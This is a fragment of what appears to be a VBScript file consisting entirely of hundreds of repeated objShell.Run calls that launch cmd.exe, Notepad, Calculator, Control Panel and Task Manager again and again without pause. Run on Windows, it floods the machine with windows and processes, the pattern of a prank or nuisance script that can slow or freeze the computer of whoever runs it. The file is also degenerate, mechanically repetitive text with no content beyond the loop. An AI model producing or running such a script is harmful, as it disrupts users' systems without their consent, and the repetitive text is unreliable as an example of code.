objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
